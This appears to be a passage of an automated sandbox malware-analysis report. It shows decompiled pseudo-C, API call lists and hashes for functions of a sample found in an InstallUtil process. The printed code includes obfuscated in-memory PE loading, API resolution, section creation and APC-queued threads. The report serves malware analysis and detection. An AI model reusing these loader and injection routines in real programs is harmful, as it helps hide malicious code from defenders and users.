                                                            • Instruction Fuzzy Hash: 3DF01CB690020CBFEB119FA5CC85CAFBBBDEB44394B10493AB552E10A0D6749E189A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401B52 Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 69%
                                                            			E00401B52(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401FEC();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403184;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401FE6();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                            0x00401b52
                                                            0x00401b5b
                                                            0x00401b5f
                                                            0x00401b65
                                                            0x00401b6a
                                                            0x00401b6f
                                                            0x00401b72
                                                            0x00401b75
                                                            0x00401b7a
                                                            0x00401b7b
                                                            0x00401b7e
                                                            0x00401b89
                                                            0x00401b90
                                                            0x00401b94
                                                            0x00401b96
                                                            0x00401b97
                                                            0x00401b9a
                                                            0x00401b9f
                                                            0x00401ba9
                                                            0x00401bab
                                                            0x00401bab
                                                            0x00401bbf
                                                            0x00401bc5
                                                            0x00401bc9
                                                            0x00401c19
                                                            0x00401bcb
                                                            0x00401bd4
                                                            0x00401bea
                                                            0x00401bf2
                                                            0x00401c04
                                                            0x00401c08
                                                            0x00000000
                                                            0x00000000
                                                            0x00401bf4
                                                            0x00401bf7
                                                            0x00401bfc
                                                            0x00401bfe
                                                            0x00401bfe
                                                            0x00401bdf
                                                            0x00401be1
                                                            0x00401c0a
                                                            0x00401c0b
                                                            0x00401c0b
                                                            0x00401bd4
                                                            0x00401c21

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?,?), ref: 00401B5F
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401B75
                                                            • _snwprintf.NTDLL ref: 00401B9A
                                                            • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401BBF
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401BD6
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401BEA
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401C02
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A), ref: 00401C0B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401C13
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1724014008-0
                                                            • Opcode ID: 7eed28f238bbb2be3c6924c8c0861bc85574067b5d57e3d4e00b1e628352c2d0
                                                            • Instruction ID: db596e8a5649e83c10a8c689c34e87f264774f047f8a301107ca2e73e99dd617
                                                            • Opcode Fuzzy Hash: 7eed28f238bbb2be3c6924c8c0861bc85574067b5d57e3d4e00b1e628352c2d0
                                                            • Instruction Fuzzy Hash: 4F2190B2944208BFD711AFA4DD88EAE37B9EB48355F114036F701F72E0D67499458B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004012D3 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 100%
                                                            			E004012D3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401935(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401265(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040188D(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                            0x004012e1
                                                            0x004012e5
                                                            0x004013a6
                                                            0x004012eb
                                                            0x00401303
                                                            0x00401312
                                                            0x00401319
                                                            0x0040131b
                                                            0x00401320
                                                            0x0040139e
                                                            0x0040139f
                                                            0x00401322
                                                            0x0040132f
                                                            0x00401331
                                                            0x00401336
                                                            0x00000000
                                                            0x00401338
                                                            0x00401345
                                                            0x00401347
                                                            0x0040134c
                                                            0x00000000
                                                            0x0040134e
                                                            0x0040135b
                                                            0x0040135d
                                                            0x00401362
                                                            0x00000000
                                                            0x00401364
                                                            0x00401371
                                                            0x00401373
                                                            0x00401378
                                                            0x00000000
                                                            0x0040137a
                                                            0x00401380
                                                            0x00401386
                                                            0x0040138b
                                                            0x00401390
                                                            0x00401395
                                                            0x00000000
                                                            0x00401397
                                                            0x0040139a
                                                            0x0040139a
                                                            0x00401395
                                                            0x00401378
                                                            0x00401362
                                                            0x0040134c
                                                            0x00401336
                                                            0x00401320
                                                            0x004013b4

                                                            APIs
                                                              • Part of subcall function 00401935: HeapAlloc.KERNEL32(00000000,?,004015EF,00000030,?,00000000), ref: 00401941
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004011FD,?,?,?,?,?,00000002,?,?), ref: 004012F7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401319
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040132F
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401345
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401371
                                                              • Part of subcall function 0040188D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,?), ref: 004018EA
                                                              • Part of subcall function 0040188D: memset.NTDLL ref: 0040190C
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 1632424568-0
                                                            • Opcode ID: c21fc4aabecbdcf30591a0a260aa5f3432069ce3644a4fc048a11e1732098a2f
                                                            • Instruction ID: f8ae8be61ab46346d26a7ad89e32e3b3a3e367cc1aef349a0b262ee2f135fa9d
                                                            • Opcode Fuzzy Hash: c21fc4aabecbdcf30591a0a260aa5f3432069ce3644a4fc048a11e1732098a2f
                                                            • Instruction Fuzzy Hash: DD212EB160070BAFE720DF6ACD84D6BB7ECAF44304701447AE905EB661DB74EA058B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E5B Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 100%
                                                            			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x403160 = _t1;
				if(_t1 != 0) {
					 *0x403170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004015C0(); // executed
					_t6 = _t4;
					HeapDestroy( *0x403160);
				}
				ExitProcess(_t6);
			}






                                                            0x00401e5c
                                                            0x00401e65
                                                            0x00401e6b
                                                            0x00401e72
                                                            0x00401e7b
                                                            0x00401e80
                                                            0x00401e86
                                                            0x00401e91
                                                            0x00401e93
                                                            0x00401e93
                                                            0x00401e9a

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401E65
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401E75
                                                            • GetCommandLineW.KERNEL32 ref: 00401E80
                                                              • Part of subcall function 004015C0: NtQuerySystemInformation.NTDLL ref: 004015FF
                                                              • Part of subcall function 004015C0: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401646
                                                              • Part of subcall function 004015C0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401675
                                                              • Part of subcall function 004015C0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401693
                                                              • Part of subcall function 004015C0: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004016BD
                                                              • Part of subcall function 004015C0: QueueUserAPC.KERNELBASE(00401A98,00000000,?,?,00000000), ref: 004016D9
                                                            • HeapDestroy.KERNEL32 ref: 00401E93
                                                            • ExitProcess.KERNEL32 ref: 00401E9A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
                                                            • String ID:
                                                            • API String ID: 2501132232-0
                                                            • Opcode ID: 75926a7ddd811df371df3967095e9d1634eab89bb0f04e0da6c08ca6a120660f
                                                            • Instruction ID: 7191445354a9c832acbed0dcd64c7ca0a75d63d9fabec9bf690f389c57a33226
                                                            • Opcode Fuzzy Hash: 75926a7ddd811df371df3967095e9d1634eab89bb0f04e0da6c08ca6a120660f
                                                            • Instruction Fuzzy Hash: 70E02675402724ABC7212F71AF0DA5F3E7CBF097967140535F606B62B0DB784A41CAAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401C24 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 88 401c24-401c45 call 401000 91 401c4b-401c85 VirtualAlloc 88->91 92 401d3d-401d42 88->92 93 401d35 91->93 94 401c8b-401c91 91->94 95 401d3c 93->95 96 401d00 94->96 97 401c93-401ca9 94->97 95->92 98 401d05-401d0a 96->98 99 401cae-401cfb call 401a60 97->99 100 401d1c 98->100 101 401d0c-401d1a call 401fac 98->101 107 401cab 99->107 108 401cfd-401cfe 99->108 104 401d23-401d33 VirtualFree 100->104 101->104 104->95 107->99 108->98
                                                            C-Code - Quality: 86%
                                                            			E00401C24(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t58;
				signed int _t67;
				intOrPtr _t69;
				intOrPtr _t85;
				intOrPtr _t86;

				_t85 =  *0x403170;
				_t46 = E00401000(_t85,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t86 = _t85 + _v24;
					_v40 = _t86;
					_t53 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t67 <= 0) {
							_t54 =  *0x403180;
						} else {
							_t69 = _a4;
							_t58 = _t53 - _t86;
							_t13 = _t69 + 0x4041a7; // 0x4041a7
							_v32 = _t58;
							_v36 = _t58 + _t13;
							_v12 = _t86;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401A60(_v12 + _t58, _v12, _v52 - _v8 + _v48 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x403180 = _t54;
								if(_v8 >= _t67) {
									break;
								}
								_t58 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							E00401FAC(_v16, _v28, _v40);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                            0x00401c2b
                                                            0x00401c3b
                                                            0x00401c40
                                                            0x00401c45
                                                            0x00401c5a
                                                            0x00401c61
                                                            0x00401c66
                                                            0x00401c77
                                                            0x00401c7a
                                                            0x00401c80
                                                            0x00401c85
                                                            0x00401d35
                                                            0x00401c8b
                                                            0x00401c8b
                                                            0x00401c91
                                                            0x00401d00
                                                            0x00401c93
                                                            0x00401c93
                                                            0x00401c96
                                                            0x00401c98
                                                            0x00401ca0
                                                            0x00401ca3
                                                            0x00401ca6
                                                            0x00401cae
                                                            0x00401cb9
                                                            0x00401cba
                                                            0x00401cbb
                                                            0x00401cd8
                                                            0x00401ce6
                                                            0x00401ced
                                                            0x00401cf0
                                                            0x00401cf3
                                                            0x00401cfb
                                                            0x00000000
                                                            0x00000000
                                                            0x00401cab
                                                            0x00401cab
                                                            0x00401cfd
                                                            0x00401d0a
                                                            0x00401d1c
                                                            0x00401d0c
                                                            0x00401d15
                                                            0x00401d15
                                                            0x00401d2d
                                                            0x00401d2d
                                                            0x00401d3c
                                                            0x00401d42

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,0040163F,00000000), ref: 00401C7A
                                                            • VirtualFree.KERNELBASE(0040163F,00000000,00008000,?,?,?,?,?,?,0040163F,00000000), ref: 00401D2D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID: Apr 26 2022
                                                            • API String ID: 2087232378-3671839962
                                                            • Opcode ID: 972696eea84d78f1abef1bce6428b3f82cfd358d2d0ec47ebaaeddd182fdb425
                                                            • Instruction ID: 287af2a0c01fcaa00a14418a69f75b7b10e4618bcd9a192694d8757be1fecab0
                                                            • Opcode Fuzzy Hash: 972696eea84d78f1abef1bce6428b3f82cfd358d2d0ec47ebaaeddd182fdb425
                                                            • Instruction Fuzzy Hash: 00313275D00219AFDB01CF94D984BEEB7B8FF08304F10416AE911BB291D779AA06CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040105A Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 109 40105a-40109d VirtualProtect 110 401132-401139 109->110 111 4010a3-4010a7 109->111 111->110 112 4010ad-4010b7 111->112 113 4010d5-4010df 112->113 114 4010b9-4010c3 112->114 115 4010e1-4010f1 113->115 116 4010f3 113->116 117 4010c5-4010cb 114->117 118 4010cd-4010d3 114->118 115->116 119 4010f9-40110c VirtualProtect 115->119 116->119 117->119 118->119 120 401117-40112c 119->120 121 40110e-401114 GetLastError 119->121 120->110 120->111 121->120
                                                            C-Code - Quality: 87%
                                                            			E0040105A(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                            0x00401064
                                                            0x00401071
                                                            0x00401077
                                                            0x00401083
                                                            0x00401093
                                                            0x00401095
                                                            0x0040109d
                                                            0x00401132
                                                            0x00401139
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004010a3
                                                            0x004010a3
                                                            0x004010a3
                                                            0x004010a7
                                                            0x00000000
                                                            0x00000000
                                                            0x004010b3
                                                            0x004010b7
                                                            0x004010db
                                                            0x004010df
                                                            0x004010f3
                                                            0x004010f3
                                                            0x004010f9
                                                            0x00401108
                                                            0x0040110c
                                                            0x00401114
                                                            0x00401114
                                                            0x0040111c
                                                            0x0040111f
                                                            0x0040112c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040112c
                                                            0x004010e7
                                                            0x004010eb
                                                            0x004010f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004010f1
                                                            0x004010bf
                                                            0x004010c3
                                                            0x004010cd
                                                            0x004010c5
                                                            0x004010c5
                                                            0x004010c5
                                                            0x00000000
                                                            0x004010c3
                                                            0x00000000

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401093
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401108
                                                            • GetLastError.KERNEL32 ref: 0040110E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1469625949-0
                                                            • Opcode ID: ea78442fbb6f8df02cfb9288583b02d0742626e1adf08fd53ab95bf3c78785da
                                                            • Instruction ID: fe3dbcecb8e3adfab23722be9ea9b663c21ebef7aa247796aadf6149567b5b35
                                                            • Opcode Fuzzy Hash: ea78442fbb6f8df02cfb9288583b02d0742626e1adf08fd53ab95bf3c78785da
                                                            • Instruction Fuzzy Hash: AD216271800209DFCB18DF85C985ABAF7F4FF48345F01446AD242E7559E3B8AA69CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401EA1 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 122 401ea1-401ebe 123 401fa4-401fa9 122->123 124 401ec4-401ece 122->124 124->123 125 401ed4 124->125 126 401ed5-401ee4 LoadLibraryA 125->126 127 401f9a-401fa0 126->127 128 401eea-401f00 126->128 129 401fa3 127->129 130 401f02-401f06 128->130 131 401f08-401f10 128->131 129->123 130->131 132 401f86-401f92 130->132 133 401f75-401f79 131->133 132->126 136 401f98 132->136 134 401f12 133->134 135 401f7b 133->135 137 401f14-401f16 134->137 138 401f18-401f1a 134->138 135->132 136->129 141 401f28-401f2b 137->141 139 401f1c-401f26 138->139 140 401f2d-401f34 138->140 139->140 139->141 142 401f37-401f3c 140->142 141->142 143 401f43 142->143 144 401f3e-401f41 142->144 145 401f47-401f53 GetProcAddress 143->145 144->145 146 401f55-401f5a 145->146 147 401f7d-401f83 145->147 148 401f64-401f72 146->148 149 401f5c-401f62 146->149 147->132 148->133 149->148
                                                            C-Code - Quality: 100%
                                                            			E00401EA1(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                            0x00401ea1
                                                            0x00401eaa
                                                            0x00401eaf
                                                            0x00401eb5
                                                            0x00401ebe
                                                            0x00401ec4
                                                            0x00401ec6
                                                            0x00401ec9
                                                            0x00401ece
                                                            0x00401ed5
                                                            0x00401ed5
                                                            0x00401ed9
                                                            0x00401edf
                                                            0x00401ee4
                                                            0x00000000
                                                            0x00000000
                                                            0x00401eea
                                                            0x00401ef4
                                                            0x00401ef6
                                                            0x00401ef9
                                                            0x00401efc
                                                            0x00401f00
                                                            0x00401f08
                                                            0x00401f0a
                                                            0x00401f0d
                                                            0x00401f75
                                                            0x00401f75
                                                            0x00401f79
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f12
                                                            0x00401f18
                                                            0x00401f1a
                                                            0x00401f2d
                                                            0x00401f30
                                                            0x00401f30
                                                            0x00401f30
                                                            0x00401f34
                                                            0x00401f1c
                                                            0x00401f1c
                                                            0x00401f24
                                                            0x00401f26
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f26
                                                            0x00401f14
                                                            0x00401f14
                                                            0x00401f28
                                                            0x00401f28
                                                            0x00401f28
                                                            0x00401f37
                                                            0x00401f3a
                                                            0x00401f3c
                                                            0x00401f43
                                                            0x00401f3e
                                                            0x00401f3e
                                                            0x00401f3e
                                                            0x00401f4b
                                                            0x00401f51
                                                            0x00401f53
                                                            0x00401f83
                                                            0x00401f55
                                                            0x00401f55
                                                            0x00401f58
                                                            0x00401f5a
                                                            0x00401f62
                                                            0x00401f62
                                                            0x00401f67
                                                            0x00401f69
                                                            0x00401f70
                                                            0x00401f72
                                                            0x00401f72
                                                            0x00401f72
                                                            0x00000000
                                                            0x00401f72
                                                            0x00000000
                                                            0x00401f53
                                                            0x00401f02
                                                            0x00401f02
                                                            0x00401f06
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f06
                                                            0x00401f86
                                                            0x00401f86
                                                            0x00401f8d
                                                            0x00401f92
                                                            0x00000000
                                                            0x00000000
                                                            0x00401f98
                                                            0x00401fa3
                                                            0x00000000
                                                            0x00401fa3
                                                            0x00401f9a
                                                            0x00401f9a
                                                            0x00401fa0
                                                            0x00000000
                                                            0x00401fa0
                                                            0x00401ece
                                                            0x00401fa4
                                                            0x00401fa9

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401ED9
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00401F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 2574300362-0
                                                            • Opcode ID: b08856e33ae3e4837c86fa3f6296e1e38edeba7740de660ba33458cc8f5fd904
                                                            • Instruction ID: 951c655037779ae1b66cd19760bdbfc8ab9dfec7e1627345683cfc52122a3d54
                                                            • Opcode Fuzzy Hash: b08856e33ae3e4837c86fa3f6296e1e38edeba7740de660ba33458cc8f5fd904
                                                            • Instruction Fuzzy Hash: B43117B1A002069FDB14CF59C884AAEB7F4BF44355B24417AE901FB3A0E778DA41CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401A98 Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
